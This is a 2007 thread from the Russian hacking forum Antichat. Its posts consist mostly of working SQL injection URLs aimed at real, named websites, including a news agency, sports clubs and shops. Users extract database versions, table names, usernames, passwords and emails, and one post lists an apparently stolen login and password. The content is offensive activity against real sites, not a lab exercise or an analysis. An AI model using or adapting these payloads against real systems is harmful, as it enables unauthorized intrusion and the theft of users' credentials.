ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1701  
Старый 07.04.2007, 13:56
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию

Цитата:
Сообщение от n1†R0x  
походу пассы в 'pass', в остальных случаях выдает ошибку..
Код:
http://nfs.com.ua/file_details.phtml?id=341+union+select+1,2,3,4,5,6,7,concat(name,0x3a,pass),9,10,11,12,13,14,15,16,17,18,19,20+from+members+limit+5,1/*
либо логин в другой, либо справа не та форма авторизации..
странно, почему у всех 'name' префикс USSRx и почему все 'pass' 4хзначные..
Там вобще какая-то странная скуля =\

Цитата:
http://nfs.com.ua/forum/index.php?act=Online&st=-1
НО :

Цитата:
http://nfs.com.ua/file_details.phtml?id=341+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+ibf_m embers/*
 
Ответить с цитированием

  #1702  
Старый 07.04.2007, 14:05
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://www.stpatsfc.com/news.php?id=-1463+union+select+1,2,3,4,concat(password,0x3a,email),6+from+members/*
http://stpatsfc.com/admin/ меня наверное глючит но на админке нету пароля))))))))
 
Ответить с цитированием

  #1703  
Старый 07.04.2007, 14:08
random
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972

Репутация: 250
По умолчанию

clubclass04: pillocks
Код:
http://www.glidingteam.co.uk/competitions/2006/nzgrandprix/viewnewsarticle.php?id=-184+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15+from+users/*
-
Код:
http://www.karmichaelhr.com/pages/viewnewsarticle.php?article=6+union+select+1,concat(database(),0x3a,version()),3,4/*

Последний раз редактировалось random; 07.04.2007 в 14:11..
 
Ответить с цитированием

  #1704  
Старый 07.04.2007, 14:43
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

Цитата:
http://mrg.net.ru/showrel07.php?ID=-1+union+select+1,2,3,4/*
сим-рейсинг
 
Ответить с цитированием

  #1705  
Старый 07.04.2007, 15:05
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

Цитата:
http://www.cyberacing.ru/index.php?lang=ru&p=105&action=topic&id=-1+union+select+1,2,3,4,5,6,7/*
гы а я тут как то участвовал)) дальше не полезу, носков нету, а то забанят ещё)
 
Ответить с цитированием

  #1706  
Старый 07.04.2007, 15:08
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

Цитата:
http://www.cyberacing.ru/index.php?lang=ru&p=105&action=storage&stamp=-1+union+select+1,2,3,4,5,6,7/*
в самом низу
 
Ответить с цитированием

  #1707  
Старый 07.04.2007, 16:03
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.tass-ural.ru/news/?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,table_name+from+information_schema.tables+limit+52,1/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,table_name+from+information_schema.tables+limit+55,1/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,column_name+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114)+limit+0,1/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,convert(concat(id,char(58),fio,char(58),job),char)+from+member+limit+0,1/*
Код:
http://www.skladcd.com/?index=3&cat=4&cdinfo=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4/*
 
Ответить с цитированием

  #1708  
Старый 07.04.2007, 16:06
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://www.marycoughlanmusic.com/shop.php?id=-47%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12+from+admin/*
чето нигде не выводит
 
Ответить с цитированием

  #1709  
Старый 07.04.2007, 16:30
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

Цитата:
2alextoun
там какая то хрень с кодировками
всё там нормально
 
Ответить с цитированием

  #1710  
Старый 07.04.2007, 16:59
»Atom1c«
Banned
Регистрация: 04.11.2006
Сообщений: 370
Провел на форуме:
1763167

Репутация: 1186
Отправить сообщение для »Atom1c« с помощью ICQ
По умолчанию

Код:
http://www.yarnovosti.com/index.php?mod=news&cid=4&id=8262-4+union+select+1,2,3,4,5,6,7,VERSION(),9,10,11,12,13,14,15,16,17,18,19/*
http://www.yarnovosti.com/index.php?mod=news&cid=4&id=8262-4+union+select+1,2,3,4,5,6,7,DATABASE(),9,10,11,12,13,14,15,16,17,18,19/*
http://www.yarnovosti.com/index.php?mod=news&cid=4&id=8262-4+union+select+1,2,3,4,5,6,7,USER(),9,10,11,12,13,14,15,16,17,18,19/*
Ярновасти...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ